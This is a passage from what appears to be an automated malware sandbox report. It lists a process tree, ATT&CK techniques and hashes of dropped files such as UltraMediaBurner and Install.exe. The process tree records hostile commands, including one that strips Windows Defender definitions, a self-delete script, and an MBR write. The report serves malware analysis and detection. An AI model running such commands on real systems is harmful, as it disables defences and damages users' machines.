                                                                            6⤵
                                                                              PID:2996
                                                                          • C:\Program Files\Windows Defender\mpcmdrun.exe
                                                                            "C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
                                                                            5⤵
                                                                            • Deletes Windows Defender Definitions
                                                                            PID:2740
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
                                                                            5⤵
                                                                              PID:3012
                                                                        • C:\Users\Admin\AppData\Local\30299709-f92a-4e39-84e2-062df40c5ed7\updatewin2.exe
                                                                          "C:\Users\Admin\AppData\Local\30299709-f92a-4e39-84e2-062df40c5ed7\updatewin2.exe"
                                                                          3⤵
                                                                          • Drops file in Drivers directory
                                                                          • Executes dropped EXE
                                                                          PID:624
                                                                        • C:\Users\Admin\AppData\Local\30299709-f92a-4e39-84e2-062df40c5ed7\5.exe
                                                                          "C:\Users\Admin\AppData\Local\30299709-f92a-4e39-84e2-062df40c5ed7\5.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Checks processor information in registry
                                                                          • Modifies system certificate store
                                                                          PID:2460
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 1372
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:1928
                                                                    • C:\Users\Admin\AppData\Local\Temp\F9BB.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\F9BB.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Writes to the Master Boot Record (MBR)
                                                                      PID:1980
                                                                    • C:\Users\Admin\AppData\Local\Temp\2E34.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\2E34.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Windows directory
                                                                      PID:840
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 520
                                                                        2⤵
                                                                        • Program crash
                                                                        PID:3052
                                                                    • C:\Users\Admin\AppData\Local\Temp\36FB.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\36FB.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:556

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                    Execution

                                                                    Command-Line Interface

                                                                    1
                                                                    T1059

                                                                    Persistence

                                                                    Registry Run Keys / Startup Folder

                                                                    1
                                                                    T1060

                                                                    Bootkit

                                                                    1
                                                                    T1067

                                                                    BITS Jobs

                                                                    1
                                                                    T1197

                                                                    Defense Evasion

                                                                    Impair Defenses

                                                                    1
                                                                    T1562

                                                                    File Permissions Modification

                                                                    1
                                                                    T1222

                                                                    Modify Registry

                                                                    3
                                                                    T1112

                                                                    BITS Jobs

                                                                    1
                                                                    T1197

                                                                    Install Root Certificate

                                                                    1
                                                                    T1130

                                                                    Credential Access

                                                                    Credentials in Files

                                                                    4
                                                                    T1081

                                                                    Discovery

                                                                    Software Discovery

                                                                    1
                                                                    T1518

                                                                    Security Software Discovery

                                                                    1
                                                                    T1063

                                                                    Query Registry

                                                                    3
                                                                    T1012

                                                                    System Information Discovery

                                                                    4
                                                                    T1082

                                                                    Peripheral Device Discovery

                                                                    1
                                                                    T1120

                                                                    Remote System Discovery

                                                                    1
                                                                    T1018

                                                                    Collection

                                                                    Data from Local System

                                                                    4
                                                                    T1005

                                                                    Command and Control

                                                                    Web Service

                                                                    1
                                                                    T1102

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                      MD5

                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                      SHA1

                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                      SHA256

                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                      SHA512

                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                      MD5

                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                      SHA1

                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                      SHA256

                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                      SHA512

                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                    • C:\Program Files\Reference Assemblies\OOEJUTXVAN\ultramediaburner.exe
                                                                      MD5

                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                      SHA1

                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                      SHA256

                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                      SHA512

                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                    • C:\Program Files\Reference Assemblies\OOEJUTXVAN\ultramediaburner.exe
                                                                      MD5

                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                      SHA1

                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                      SHA256

                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                      SHA512

                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                    • C:\Program Files\install.dat
                                                                      MD5

                                                                      806c3221a013fec9530762750556c332

                                                                      SHA1

                                                                      36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                      SHA256

                                                                      9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                      SHA512

                                                                      56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                    • C:\Program Files\install.dll
                                                                      MD5

                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                      SHA1

                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                      SHA256

                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                      SHA512

                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                      MD5

                                                                      3ef87958287f8115eee2fcb695d9ebc6

                                                                      SHA1

                                                                      e62dd56e1aa4d048270b97cd2ff9e64b0d99df53

                                                                      SHA256

                                                                      fb2470c76a28e54f48eca5f8e42ad90eb14c018b4cea0db673556b4f489a2317

                                                                      SHA512

                                                                      c45832d4f8b1cd75b3f6816d8b1450a2c0e355e2e6c4497e1d3525f483c3b69204bf16b5db0c20ebe2d97f4986a99ed96873b8d4f90d8bd89914c05585e23d9f

                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                      MD5

                                                                      d6ada7d127d3a22c064162284c6bc573

                                                                      SHA1

                                                                      d2adb35777375a4e1cdde3672bc7fc936a1ba9b2

                                                                      SHA256

                                                                      aa3a9437e42029beedbf9daac9c832903f437941cdcbf6bcda294e48951dcf4a

                                                                      SHA512

                                                                      efa986d201435b7b2e0a2a3e7cdb87edafacbbccee4a18725b3a2e156480e29d002e9568aee221978b49be534c66529de8153b4d9aa3af408aaa59b850b3a8cf

                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                      MD5

                                                                      7290d1d2ecf9b35675d3cd9cbb04d765

                                                                      SHA1

                                                                      f1ed39178e5f83487ede1e149d6b1f02d620e20c

                                                                      SHA256

                                                                      2e78dc7b280d4a9c25485286153b7358765b567d19bb339fbc266b62bf1ae28c

                                                                      SHA512

                                                                      18e75a7f4721f451fa33824743494b1172aeafbdd1820b85bbfda42a75cc83708a7cf0d89ce1f6919a1036fa2477891b9499160bfa5169e3aa69be7c65a4c5f7

                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                      MD5

                                                                      d473cc7c02fdf64dda17538f47a6c337

                                                                      SHA1

                                                                      256fa99a0fe18fe36ee57dfab2ad39008aaffaa2

                                                                      SHA256

                                                                      f9fb8c061c16ae408bb386fd61e544c4ffb15ebd3567b20e832ef88b57cbf7ee

                                                                      SHA512

                                                                      a430a414c4766a0f18bb93b3ad6a30517f65486034b23b45df334d94fc0d53457ec9f3a4a0293597253c3b1aab6594e8bdc41964312836a7cc41795e66b1e8fb

                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                      MD5

                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                      SHA1

                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                      SHA256

                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                      SHA512

                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                      MD5

                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                      SHA1

                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                      SHA256

                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                      SHA512

                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                      MD5

                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                      SHA1

                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                      SHA256

                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                      SHA512

                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                      MD5

                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                      SHA1

                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                      SHA256

                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                      SHA512

                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\John_Ship.url
                                                                      MD5

                                                                      72825692a77bb94e1f69ef91bfbbff15

                                                                      SHA1

                                                                      db898f541f5e6e4305dfe469494d0ed1d4950395

                                                                      SHA256

                                                                      6e57ce08a3feecbb59a5b257660cc517793f1adb20b75d36a9d12f921fc826e7

                                                                      SHA512

                                                                      9a2c3ba9be966bb6f3ebf188578fa335a2583ce9c3ae94cbe3a044b02a339a9ca22b4a31e8c6076c720c8632fca6d1ebbc7a4575d0fe463cb4c526c187e333b8

                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                      MD5

                                                                      3bc84c0e8831842f2ae263789217245d

                                                                      SHA1

                                                                      d60b174c7f8372036da1eb0a955200b1bb244387

                                                                      SHA256

                                                                      757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                      SHA512

                                                                      f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                      MD5

                                                                      3bc84c0e8831842f2ae263789217245d

                                                                      SHA1

                                                                      d60b174c7f8372036da1eb0a955200b1bb244387

                                                                      SHA256

                                                                      757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                      SHA512

                                                                      f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                      MD5

                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                      SHA1

                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                      SHA256

                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                      SHA512

                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                      MD5

                                                                      e72eb3a565d7b5b83c7ff6fad519c6c9

                                                                      SHA1

                                                                      1a2668a26b01828eec1415aa614743abb0a4fb70

                                                                      SHA256

                                                                      8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599

                                                                      SHA512

                                                                      71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

                                                                    • C:\Users\Admin\AppData\Local\Temp\a0-feea0-4c2-96f83-6f3e5f1f7a762\Bisydylafy.exe
                                                                      MD5

                                                                      2d39270a76729d59a593013e45a3231f

                                                                      SHA1

                                                                      ba5147f3c6648f219f2f06554e08f516b852a06b

                                                                      SHA256

                                                                      c65f79e2ebdcbf36db2b20a8d15c38143ec4c21a82c503870ca6a5b513a0dbe0

                                                                      SHA512

                                                                      cee75e21ed304c7a0b865db4bd1d4a3b112633c860fb8487c24721ce198632d2bdfd4098b864894a830f48729edcd5ba59ddceeaeebe68e21f7cbc6e3a026729

                                                                    • C:\Users\Admin\AppData\Local\Temp\a0-feea0-4c2-96f83-6f3e5f1f7a762\Bisydylafy.exe
                                                                      MD5

                                                                      2d39270a76729d59a593013e45a3231f

                                                                      SHA1

                                                                      ba5147f3c6648f219f2f06554e08f516b852a06b

                                                                      SHA256

                                                                      c65f79e2ebdcbf36db2b20a8d15c38143ec4c21a82c503870ca6a5b513a0dbe0

                                                                      SHA512

                                                                      cee75e21ed304c7a0b865db4bd1d4a3b112633c860fb8487c24721ce198632d2bdfd4098b864894a830f48729edcd5ba59ddceeaeebe68e21f7cbc6e3a026729

                                                                    • C:\Users\Admin\AppData\Local\Temp\a0-feea0-4c2-96f83-6f3e5f1f7a762\Bisydylafy.exe.config
                                                                      MD5

                                                                      98d2687aec923f98c37f7cda8de0eb19

                                                                      SHA1

                                                                      f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                      SHA256

                                                                      8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                      SHA512

                                                                      95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                    • C:\Users\Admin\AppData\Local\Temp\ba-b5332-a05-fcca3-9147c203035a5\SHacocaecaevu.exe
                                                                      MD5

                                                                      fead6072f7d234809367c3163c5b3f75

                                                                      SHA1

                                                                      df38c01e9f9cc9292e5c32ab2220c9205b878ffb

                                                                      SHA256

                                                                      54c219415f9484b21e141501012d4ecc8eb8ca82c2828ca9552f2d718a4153f2

                                                                      SHA512

                                                                      ef7f4cda4bd46d80dbacba25f185162a22127fc5a9910c34677c88a86a55c5bd91029ef69436e374cd3307d95250ab5ca034aa013a4f45734ecd6e9b120150d2

                                                                    • C:\Users\Admin\AppData\Local\Temp\ba-b5332-a05-fcca3-9147c203035a5\SHacocaecaevu.exe
                                                                      MD5

                                                                      fead6072f7d234809367c3163c5b3f75

                                                                      SHA1

                                                                      df38c01e9f9cc9292e5c32ab2220c9205b878ffb

                                                                      SHA256

                                                                      54c219415f9484b21e141501012d4ecc8eb8ca82c2828ca9552f2d718a4153f2

                                                                      SHA512

                                                                      ef7f4cda4bd46d80dbacba25f185162a22127fc5a9910c34677c88a86a55c5bd91029ef69436e374cd3307d95250ab5ca034aa013a4f45734ecd6e9b120150d2

                                                                    • C:\Users\Admin\AppData\Local\Temp\ba-b5332-a05-fcca3-9147c203035a5\SHacocaecaevu.exe.config
                                                                      MD5

                                                                      98d2687aec923f98c37f7cda8de0eb19

                                                                      SHA1

                                                                      f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                      SHA256

                                                                      8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                      SHA512

                                                                      95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                    • C:\Users\Admin\AppData\Local\Temp\is-DD7TP.tmp\ultramediaburner.tmp
                                                                      MD5

                                                                      4e8c7308803ce36c8c2c6759a504c908

                                                                      SHA1

                                                                      a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                      SHA256

                                                                      90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                      SHA512

                                                                      780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                    • C:\Users\Admin\AppData\Local\Temp\is-DD7TP.tmp\ultramediaburner.tmp
                                                                      MD5

                                                                      4e8c7308803ce36c8c2c6759a504c908

                                                                      SHA1

                                                                      a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                      SHA256

                                                                      90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                      SHA512

                                                                      780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                    • C:\Users\Admin\AppData\Local\Temp\is-IN4CL.tmp\Install.tmp
                                                                      MD5

                                                                      45ca138d0bb665df6e4bef2add68c7bf

                                                                      SHA1

                                                                      12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                      SHA256

                                                                      3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                      SHA512

                                                                      cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                    • C:\Users\Admin\AppData\Local\Temp\is-RUGN0.tmp\Ultra.exe
                                                                      MD5

                                                                      cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                      SHA1

                                                                      ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                      SHA256

                                                                      0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                      SHA512

                                                                      49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                    • C:\Users\Admin\AppData\Local\Temp\is-RUGN0.tmp\Ultra.exe
                                                                      MD5

                                                                      cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                      SHA1

                                                                      ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                      SHA256

                                                                      0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                      SHA512

                                                                      49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                    • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                      MD5

                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                      SHA1

                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                      SHA256

                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                      SHA512

                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                    • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                      MD5

                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                      SHA1

                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                      SHA256

                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                      SHA512

                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                    • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                      MD5

                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                      SHA1

                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                      SHA256

                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                      SHA512

                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                    • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                      MD5

                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                      SHA1

                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                      SHA256

                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                      SHA512

                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                    • \Program Files\install.dll
                                                                      MD5

                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                      SHA1

                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                      SHA256

                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                      SHA512

                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                    • \Program Files\install.dll
                                                                      MD5

                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                      SHA1

                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                      SHA256

                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                      SHA512

                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                    • \Program Files\install.dll
                                                                      MD5

                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                      SHA1

                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                      SHA256

                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                      SHA512

                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                    • \Program Files\install.dll
                                                                      MD5

                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                      SHA1

                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                      SHA256

                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                      SHA512

                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                      MD5

                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                      SHA1

                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                      SHA256

                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                      SHA512

                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                      MD5

                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                      SHA1

                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                      SHA256

                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                      SHA512

                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                      MD5

                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                      SHA1

                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                      SHA256

                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                      SHA512

                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                      MD5

                                                                      41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                      SHA1

                                                                      0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                      SHA256

                                                                      97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                      SHA512

                                                                      5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                      MD5

                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                      SHA1

                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                      SHA256

                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                      SHA512

                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                      MD5

                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                      SHA1

                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                      SHA256

                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                      SHA512

                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                      MD5

                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                      SHA1

                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                      SHA256

                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                      SHA512

                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                      MD5

                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                      SHA1

                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                      SHA256

                                                                      4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                      SHA512

                                                                      f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                    • \Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                      MD5

                                                                      3b1b318df4d314a35dce9e8fd89e5121

                                                                      SHA1

                                                                      55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                      SHA256

